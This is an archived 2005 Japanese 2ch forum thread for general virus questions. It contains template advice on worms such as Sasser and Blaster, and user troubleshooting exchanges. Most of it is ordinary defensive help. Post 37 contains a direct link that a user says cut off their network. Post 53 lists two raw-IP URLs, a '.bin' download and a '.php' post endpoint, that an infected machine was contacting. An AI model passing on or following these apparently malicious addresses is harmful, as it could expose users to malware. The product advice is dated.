ウィルス情報&質問 総合スレッド☆Part30

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

【  最  重  要  事  項  】
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

テンプレサイト(質問する前、書き込む前に必読)
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html
2名無しさん@お腹いっぱい。:2005/05/03(火) 13:28:16
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2005インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/Japanese/
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3名無しさん@お腹いっぱい。:2005/05/03(火) 13:28:55
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4名無しさん@お腹いっぱい。:2005/05/03(火) 13:29:25
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
5名無しさん@お腹いっぱい。:2005/05/03(火) 13:29:55
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
6名無しさん@お腹いっぱい。:2005/05/03(火) 13:30:30
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット
7名無しさん@お腹いっぱい。:2005/05/03(火) 13:30:59
「がいしゅつです」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part5
http://pc5.2ch.net/test/read.cgi/sec/1107065884/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら…助けて下さい!Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/
8名無しさん@お腹いっぱい。:2005/05/03(火) 13:31:31
関連スレッド

Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc5.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイト見たら…助けて下さい!Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc5.2ch.net/test/read.cgi/sec/1091174837/
ファイアーウォールソフト 総合Part4 (DAT落ち)
http://pc5.2ch.net/test/read.cgi/sec/1074563750/
アンチウィルスソフトのウィルス誤検出
http://pc5.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc5.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
9名無しさん@お腹いっぱい。:2005/05/03(火) 13:33:37
ググったけど、英語でよくわからない!人は

Excite エキサイト 翻訳 英語翻訳>ウェブページ翻訳
ttp://www.excite.co.jp/world/english/web/

を使ってみよう。

PC関係の用語が分からない場合は、下記のサイトでも調べて見ましょう。
・IT用語辞典e-Words
http://e-words.jp/
・アスキーデジタル用語辞典
http://yougo.ascii24.com/

(一応)前スレ
ウィルス情報&質問 総合スレッド☆Part29
http://pc8.2ch.net/test/read.cgi/sec/1111407467/

テンプレ終了。
貼り落とし・最新情報への更新忘れ等あった場合は随時修正願います。
10名無しさん@お腹いっぱい。:2005/05/03(火) 13:46:56
Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/
現在は↓

Winnyを狙ったワーム・ニュイルス情報 Part38
http://tmp5.2ch.net/test/read.cgi/download/1113652734/
11岩隈氏ね:2005/05/03(火) 14:08:51
>>1
乙です
12名無しさん@お腹いっぱい。:2005/05/03(火) 15:50:00
【使用OS】 Windows2000
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 トレンドマイクロ オンラインスキャンのみW
【ちゃんとUpdateしてるか】 一ヶ月に一回位
【スキャンした結果(ウイルス名・発見場所)】 出てきません
【別のオンラインスキャンしたならその結果は】 シマンテックで試したが、こちらも出ず
【症状を具体的に、分かる限りすべて書く】
登録ユーザーが二人いました。
Aが私の使っているID,Bが家族が使っている物です。
BのIDでログインをした後、普通にログアウトした所、ログイン画面が出るまでに凄く時間が掛かりました。
再度、Bでログインした所、Documents and Settings\B(ユーザー名)の全ファイルが削除されていました。
IDは消えていませんでしたが、フォルダ構成やファイル類は新規ユーザー状態になっていました。
ちなみにAの方は何も問題がありません。
【何をしたらそんなことになったのか】
症状が出る直前のBユーザーはHotmailの確認とエクセルを開いたそうです。
それ以外の作業はしていません。
【これまでにとった措置】
とりあえずオンラインスキャン。
【その他の質問】
最初はユーザーIDの有効期限が切れたかと思ったのですが。
その場合は「管理者に問い合わせて下さい」等の文章が表示されますよね?
何かのウイルスor悪質なマクロかと思っているんですが....
13名無しさん@お腹いっぱい。:2005/05/03(火) 17:49:11
使用OS】  Windows2000
【WindowsUpdateしてるか】  していません(容量過少のため、Update不能になりました)
【AntiVirusは何を使っているか】 ノートン使用
【ちゃんとUpdateしてるか】 していません
【スキャンした結果(ウイルス名・発見場所)】 ノートンのスキャンでは『ウィルスは見つかりませんでした』
【別のオンラインスキャンしたならその結果は】 wmplayer.exeというファイルがDownloader.Trojanに感染
トロイの木馬?
【症状を具体的に、分かる限りすべて書く】 常に何回も『wmplayer.exe』がインターネット接続を求めてくる
ノートン先生が何回も訊ねてくる『危険度高いので、遮断を推奨』といった胸のウィンドウが出て来る
【何をしたらそんなことになったのか】 したらばBBSで感染しました
【これまでにとった措置】 wmplayer.exeを削除しようとしたのですが『現在使用中』ということで
削除不能です
【その他の質問】 上記のウィルス感染したファイル、何とか削除したいのですが
無理でしょうか?

何卒宜しくお願い致します
14名無しさん@お腹いっぱい。:2005/05/03(火) 18:15:15
>>13
タスクマネージャーでwmplayer.exeのプロセスを終了させてから削除はできない?
15名無しさん@お腹いっぱい。:2005/05/03(火) 19:09:18
>>14
ありがとうございます。
タスクマネージャーのプロセスのタブからも
wmplayer.exeが出て来ないんです。。
直接ファイルを右クリックし、削除を試みても
『wmplayerを削除できません。アクセスできません。送り側のファイルが使用中の可能性があります。』
と出て来て手も足も出ません。。
16名無しさん@お腹いっぱい。:2005/05/03(火) 19:22:24
>>15
セーフモードで起動してから削除は?
17名無しさん@お腹いっぱい。:2005/05/03(火) 20:24:06
>>16=>>14でしょうか?

先ほど、ファイル削除に成功しました。

お教え頂きました通り、セーフモードで起動しようとして
再起動したのですが、失敗しました。
それから、タスクマネージャのプロセスタブをアクセスすると
wmplayerがありましたので
プロセスを終了→そのままwmplayer削除、の手順で成功しました。

ただ、どさくさに紛れていたのか
メディアプレイヤーのほうもやられていたので、これからダウンロードしなおします。

本当に、ご丁寧にお教え頂きまして、誠に有難うございました。
これからはちゃんと気をつけます。
18名無しさん@お腹いっぱい。:2005/05/03(火) 20:28:33
俺はウイルスをもらったことがない。

ルーター使って、Outlook Expressを使わなきゃ、ふつう感染しないだろ?
ブラクラ踏んだり、IEのホームページを書換えられたことはあるけど。
セキュリティソフトなんて、金の無駄使いだと思うが。どうよ?
19名無しさん@お腹いっぱい。:2005/05/03(火) 20:46:36
>>18
正直言ってブラクラ踏んだりIEのホームページ書き換えられる程度のヤツに
「ウィルス対策が万全ならセキュリティソフトなんて金の無駄じゃね?」
とか言われても素直に頷けないな


というかIE使ってる時点で(ry
20名無しさん@お腹いっぱい。:2005/05/03(火) 21:05:24
よく見るんだ
何か垂れている
                 >>18
                  |
   ∩___∩         |
   | ノ,,_   _,ヽ       |
  /  "゚'` {"゚` |   …   J
  | ∪  ,__''_  ミ      
 彡、    ー    |       
/     ∩ノ ⊃  ヽ  
(  \ / _ノ |  |
.\ “  /__|  |
  \ /___ /
21名無しさん@お腹いっぱい。:2005/05/03(火) 21:33:24
>>18
保険も貯蓄も健康で稼げるうちは無駄だよね。
まあそうじゃない時のために備えるのが「人間の知恵」の部分だが。

腹が減ってないから備蓄は無駄なんて言ってたら
クマさんリスさんにも笑われるよ。
22名無しさん@お腹いっぱい。:2005/05/03(火) 23:08:25
板違いかもしれないですが
お勧めのセキュリティソフトってなんですか?
もともとパソにノートン入ってたんですけど
そろそろアップデートの期限が迫って
ノートンは重いって聞いてるんですけど
ちゃんとしてるやつがいいしなぁ・・・
23名無しさん@お腹いっぱい。:2005/05/03(火) 23:13:36
>>22
「一番いいセキュリティソフトはなんだ!!」ってスレも機能果たしてないしな・・・。
とりあえず各ソフトのスレのログ読んだ上で絞り込んで、
見込んだソフトの体験版使ってみ。
こればっかりは自分が使いやすいと思ったものが他人にも使いやすいとは限らないし、
特定のソフトを勧めるレスはスレが荒れる元になるからあまりしたくない。
24名無しさん@お腹いっぱい。:2005/05/03(火) 23:31:37
>>22
重いとかってPCの性能によって相対的なものだから。あと使い手の我慢強さとかも。
「聞いてる」っていうけど自分で耐えられないと思わないならそのまま更新しちゃえば。
大手はどこもかわらん。あ、ソースネクストは大手じゃないから。断じて。
25お助けを:2005/05/03(火) 23:37:54
すみません。これはウィルスかどうかは分からないのですが、
先日からパソコンがオカシイのです。ウィンドウや、ブラウザを閉じるボタンや、
チェックボックス、矢印、等が全て記号や、数字になってしまいました…
パソコン自体もおかしい気がします。ウィルスバスターってやつで検索しても
何も出てこないんですが。前もこの症状になって、ウィンドウズを入れなおした
事があります。お助けを。
使用OS:ME。UPDATEはしてます。理由不明です。
26名無しさん@お腹いっぱい。:2005/05/03(火) 23:44:09
>>25
それはWindows9x系の既知のバグ。
ウィルスでも何でもない。
フォントキャッシュが壊れてるだけで、
そのキャッシュを削除すれば直る。

直し方なんかは

Windows9x(95/98)・Me質問スレッド Part47
http://pc8.2ch.net/test/read.cgi/win/1112788548/

ここいって、最初の1-10辺り読んでみ
27お助けを:2005/05/03(火) 23:47:40
>26様
大感謝です!ありがとうございます。ちょっと見て勉強してみます。
また報告します。初心者で…
2825:2005/05/04(水) 00:22:55
>26様。
お蔭様でなおりました。すっきり。
お手数お掛けしました。
ご親切にありがとうございました。多謝
29名無しさん@お腹いっぱい。:2005/05/04(水) 01:01:45
スタートアップにdaemon.exeというファイルが解凍されたようなのですが、
消そうとしてもそのexeファイルが表示されません。
どうか助言をお願いします。

30名無しさん@お腹いっぱい。:2005/05/04(水) 01:05:33
>>29
daemontoolじゃないの?
31名無しさん@お腹いっぱい。:2005/05/04(水) 01:07:34
>>29
まず状況を説明汁。
>>1のテンプレに従ったうえで、何故そのことに気付いたかぐらいは言わないと
藻前のPCの状況なんて誰も把握してないし。
3229:2005/05/04(水) 01:19:16
失礼しました。
OSはxpです。
updateは2週間くらい前にしました。
ノートンを使っています。
これもupdateは2週間くらい前に。
スキャンした結果は何もありませんでした。
あるzipファイルを解凍したらスタートアップフォルダにそのexeファイルも
解凍されたようです。
ダウンロードスレをみたら同じzipファイルを解凍してそのexeファイルも解
凍されたというカキコがあったので間違いないと思います。
そのスレでは再起動するとヤバイのですぐにそのexeファイルを消せと言われ
たのですが、スタートアップフォルダにはそのexeファイルが表示されません。
プロパティをみると何かのファイルが1つあるみたいなんですが。
どうすればファイルが見えるようになるんでしょうか。
どうかお願いします。
33名無しさん@お腹いっぱい。:2005/05/04(水) 01:37:08
>>32
daemon.exeでぐぐるとほとんど
デーモンツールばっかだけど

http://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-w32.selotima.a.html
他に該当となるとこれか?
3429:2005/05/04(水) 02:02:11
スタートアップをフォルダごと消して、新しく作り直しました。
解凍ソフトもLhaplusの最新版に変えました。
どうもお騒がせして申し訳ありませんでした。
35名無しさん@お腹いっぱい。:2005/05/04(水) 02:06:50
>>34
それで直ったのか?
>>33のだとやばそうだが
36名無しさん@お腹いっぱい。:2005/05/04(水) 02:13:17
一応ウイルスチェックしておけ
37名無しさん@お腹いっぱい。:2005/05/04(水) 02:20:19
さっきこのリンクを踏んでしまったのですが
http://www.hellplant.org/cgi-bin/xoor/serpent.cgi
ネットに繋がらなくなってしまいました。
ウィンXPです。何か解決法等はあるのでしょうか?
38名無しさん@お腹いっぱい。:2005/05/04(水) 02:43:34
最近PCにOS再インストールしたんですが、それ以来1時間半程度すると勝手にPCが落ちるようになりました。
いきなり、何の前兆もなく再起動します。
以前はそんなことまったくなかったんですが…
OSは2000NTです。Avast!の4.6を使ってるくらいしか今までと変更はないんですが…これが原因とは思いづらい…
Windouwsのアップデートは済んでいます。
ウイルススキャンは普通にとセーフモードでやりましたが検出されていません。
何か原因かわかる方いらっしゃいましたら助言頂けないでしょうか?
ちなみにMSBLASTではないようです。LSASS.EXEファイルに関するメッセージも見てません。
39名無しさん@お腹いっぱい。:2005/05/04(水) 03:04:25
>>38
2000かNTどっちだ?
SPは?
システム管理ツールのイベントビューア見て手がかりは掴めないか?
40名無しさん@お腹いっぱい。:2005/05/04(水) 08:40:48
>>39
2000NTです。SPはいりません。
41名無しさん@お腹いっぱい。:2005/05/04(水) 14:01:04
Windows2000 Professional
Windows2000 Server
Windows2000 Advanced Server
Windows2000 Datacenter Server

これ以外にWindows2000NTってのがあるの? 知らなかったよ
42名無しさん@お腹いっぱい。:2005/05/04(水) 14:04:55
いぢわるね(´σ∀`)つ・)))´∀`41)
43名無しさん@お腹いっぱい。:2005/05/04(水) 14:06:02
たぶん、その「NT」っていうのは「ニュータイプ」の略と見た。かっこいい。
4438:2005/05/04(水) 14:45:48
あああすいません…使っているOSは2000Proです。
5時間飲み会して帰ってきたので頭おかしくなってました。

そして今現在も勝手にPC再起動します。条件等は不明。
最短で5分くらいで落ちます。
45名無しさん@お腹いっぱい。:2005/05/04(水) 14:58:11
>>40でSPはいりません、て書いてるけど、Windows Updateしてないって事?
>>38ではしてるって書いてるから恐らくSP4なんだろうけど・・・

で、再確認
PCのパーツやOSとかの変更なし(クロックアップとかも無し)
以前のまともな時との違いはAvast!の4.6を使ってる(これは以前よりVerが違うだけか新しく使うようになったのかは知らんが)

つーか、特にウィルスくらったり変なアプリをインスコした憶えがないならメモリとかパーツの問題のような気がする
46名無しさん@お腹いっぱい。:2005/05/04(水) 14:59:09
>>44
いや、「SPはいりません」じゃなくてね。
サービスパックは何を適用してるの?
47名無しさん@お腹いっぱい。:2005/05/04(水) 15:07:03
5時間飲んでて頭おかしくなってただぁ?
(´・ω・`)知らんがな
48名無しさん@お腹いっぱい。:2005/05/04(水) 15:18:53
メーラのBecky!で今日受信した添付ファイルの中にウィルスが入っていると
ウィルスバスターオンラインで判定されたんですが、
該当のメールを丸ごとゴミ箱から削除しても残っていると判定されてしまいます。
どうも20050503.bkl というファイルにバイナリレベルで文字列が書き込まれているようなのですが、
これをテキストエディタで開いて編集するのはマズいでしょうか?

もしくは削除したいのですが、右クリックしただけで感染、ということはあり得ますか?
49名無しさん@お腹いっぱい。:2005/05/04(水) 15:24:28
>>48
それはむしろBecky!固有というかBecky!依存で発生する問題。
ファイル名見ただけで受信メールのバックアップログってことは想像がつくが、
ユーザー有志のFAQの類をまず調べた方が早かったな。
http://www.rimarts.com/bbs_b2/cyclamen.cgi?ol=200205&tree=r11860#11860
50名無しさん@お腹いっぱい。:2005/05/04(水) 15:28:48
>>49
すみません。誘導ありがとう
51名無しさん@お腹いっぱい。:2005/05/04(水) 15:39:08

海外からスパムメールが最近来るようになったのですが、その中に私の実名がタイトルに載ってるやつがきました。

差出人のアドレスがhideakifan.comとなっていたので、ググってみたところ、

ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.spbot.b.html

というウイルス情報を発見しました。

私の実名を知る誰かのPCにこのウイルスが感染しているということでしょうか?

このメールアドレスで実名を使うのはネット通販ぐらいなものなので、ちょっと不気味です。

放置して置いてもよいものでしょうか?
52名無しさん@お腹いっぱい。:2005/05/04(水) 21:58:46
前スレもう落ちたのか
53名無しさん@お腹いっぱい。:2005/05/04(水) 22:10:21
ttp://66.98.144.29/avir.cn.bin
ttp://69.57.136.113/post2.php

↑の2つのURLに勝手にアクセスしちゃうんですが、これが何か分かる方いますか?
ログを見ると、ほぼ同時にアクセスしているから無関係ではないと思うんだけど・・・
54名無しさん@お腹いっぱい。:2005/05/04(水) 22:14:45
>>53
とりあえず、スキャンしてみたらどうよ?
5538:2005/05/04(水) 22:27:40
>>45

SPは1…かな?IEのバーション情報では1になってます。
重要な更新はすでになく、入れられるものはみんないれてあります。

ちなみに…40は私じゃありません。別人です。

PCのパーツ及びOSは以前と変更はありません。クロックアップもしてません。
以前のまともな頃はAvast!を使ってませんでした。けど切っても落ちるようです。
で、セーフモードだと何時間たっても落ちませんでした。
何がいけないのかさっぱりです。
5638:2005/05/04(水) 22:29:14

げげ、間違えてあげてしまった…失礼しました。
あとサービスパックに関することは>>46さんのほうの答えです。
57名無しさん@お腹いっぱい。:2005/05/04(水) 22:42:08
>>56
IEのSPと2000のSPは違うよ。
マイコンピュータのプロパティで見られる方。

それから、イベントビューアの方も調べてみること。
起動時や終了時になんかイベント吐いてるかも知れないし。
5838:2005/05/04(水) 23:34:27
>>57

訂正ありがとうございます、SPは4でした。
無知ですいません。

イベントビューアも見てきましたが、特に起動時にも終了時にもおかしなログはなかったです。
昼にネットつないでるUSBケーブル前と場所かえたので元に戻しましたが…
これで直るわけないとおもうけど、現在1時間半以上落ちてない。
まさかこんな原因なのだろうか…?
59名無しさん@お腹いっぱい。:2005/05/04(水) 23:50:24
>>58
それは有り得る。
トラブルの原因なんてどうしようもなく些細なことだったりするからな…
60名無しさん@お腹いっぱい。:2005/05/05(木) 07:13:47
ノートパソコンを使ってるのですが、最近排熱ファンが稼動しなくなりました。
排熱ファンの稼動を止めてしまうようなウイルスやデバイス改ざんソフトはありますか?
61名無しさん@お腹いっぱい。:2005/05/05(木) 10:37:18
「オッカムの剃刀」って言葉があるそうだ。
「ある事柄を説明するのに、必要以上の仮説を立ててはならない」 
「現象を同程度うまく説明する仮説があるなら、よりシンプルな方を選ぶべきである」
って意味だそうだ。

以前、「PCの電源がはいらない!」って言われたことがある。
俺が一番最初に確認すべきだと思ったことは「コンセント抜けてない?」

62名無しさん@お腹いっぱい。:2005/05/05(木) 10:51:44
マイドキュメント内にある、Fgwってフォルダは何ですか?
いったん消したのですが、復活しました。
フォルダ内にはdatebaseとかU backgrとか5つあって
いずれも、なヵにはGroup000というフォルダがあり、
さらに、その中には、エクセルCSVファイルってのが
あります。
Ad-Aware,AVG free editionを使ってますが、反応はありませんが、
心配なので書き込みさせていただきました。


63名無しさん@お腹いっぱい。:2005/05/05(木) 11:08:57
>>62
筆ぐるめを使ってるのでは?
64名無しさん@お腹いっぱい。:2005/05/05(木) 11:47:49
>>60
ホコリつもってまわらなくなっちゃったとかってオチじゃないだろうな。
65名無しさん@お腹いっぱい。:2005/05/05(木) 12:37:34
>>63
なるほど・・・
パソコンは父親もつかってるので、筆ぐるめなのでしょう。
心配でシマンテックでウィルススキャンしたら、Fgwは問題なしでした。

が、
C:\Program Files\ShopperReports\Bin\1.0.4.0\ShprRprt.dll は
 Adware.Hotbar に感染しています。
C:\Program Files\gikoNavi\Log\2ch\news\1104371687.dat は
 Unix.Penguin に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liveanb\1110283752.dat は
 Unix.Penguin に感染しています。
となったので、今から駆除しないといけません・・・・

66名無しさん@お腹いっぱい。:2005/05/05(木) 12:39:44
>>65
ギコナビのログは関係ないのでは?
誤検出っぽい。
67名無しさん@お腹いっぱい。:2005/05/05(木) 12:46:53
>>65
>C:\Program Files\ShopperReports\Bin\1.0.4.0\ShprRprt.dll は
>Adware.Hotbar に感染しています。

これだけ駆除すれ
68名無しさん@お腹いっぱい。:2005/05/05(木) 12:54:01
65です。
よくわかってないのですが、Adwareってスパイウェア対策のソフト
なのに、コレ自体がウィルスなんですか?
削除方法をさがしているのですが、もしお分かりでしたら
ご指導おねがいします。
69名無しさん@お腹いっぱい。:2005/05/05(木) 12:58:50
拡張子を表示するようにしたらフォルダを開く前に危険を察知できたりするんですか?
70名無しさん@お腹いっぱい。:2005/05/05(木) 13:01:07
>>68
AdwareとAd-awareは違う

スパイウェア削除ソフトAd-awareSE その21
http://pc8.2ch.net/test/read.cgi/sec/1114957620/

Adware.Hotbar駆除方法
http://www.symantec.com/region/jp/avcenter/venc/data/adware.hotbar.html
71名無しさん@お腹いっぱい。:2005/05/05(木) 13:07:02
>>69
フォルダなのか、フォルダに偽装した実行ファイルか
判別しやすくなるため、危険度が低くなる。
72名無しさん@お腹いっぱい。:2005/05/05(木) 13:13:28
>>71
ありがとうございます。
zipファイルの詳細設定を常に拡張子を表示するにチェックを入れましたが
何も変わった様子がありません。他に何か設定することがあるんでしょうか?
73名無しさん@お腹いっぱい。:2005/05/05(木) 13:32:55
>>72
zipだけじゃなくて、すべて表示させるようにする。

エクスプローラの設定
「ツール」−「フォルダオプション」ー「表示」で「登録されている
ファイルの拡張子は表示しない」のチェックを外すでOK。
74名無しさん@お腹いっぱい。:2005/05/05(木) 13:34:36
>>70
プログラムの追加と削除でShopperReportsを削除しました。
ツールバー?に変なボタンあると思ってたらコレだったんですね。
ぜんぜん気づかなかった・・・
このたびは,ありがとうございました。
75名無しさん@お腹いっぱい。:2005/05/05(木) 13:43:09
>>73
早速のレスありがとうございます。
それだけでよかったんですね。では今まで勝手にいじってしまった分もあるので
全フォルダをリセットしてから行った方がいいんでしょうか?
76名無しさん@お腹いっぱい。:2005/05/05(木) 20:53:00
ここにはひっかかってる香具師はいないと思うが、念のため・・・

運営の山田ウィルス報告&対策スレ
http://qb5.2ch.net/test/read.cgi/operate/1114695735/l50
77名無しさん@お腹いっぱい。:2005/05/05(木) 22:58:55
すみません、Windows、XPがウイルスにやられて電源入れても初めの画面だけ出てあとは真っ暗になるんですがこの症状が出たらもう完全に無理ですか?
それとも電気屋に持っていったら何とかなりますか?
とんでもなく無知ですみません。どなたかお願いします。
78名無しさん@お腹いっぱい。:2005/05/05(木) 23:11:38
>>77
まずはセーフモードで起動してみましょう
79名無しさん@お腹いっぱい。:2005/05/06(金) 01:53:34
>>64
60だけど、そういうオチはない。
こちらの事例はともかく、
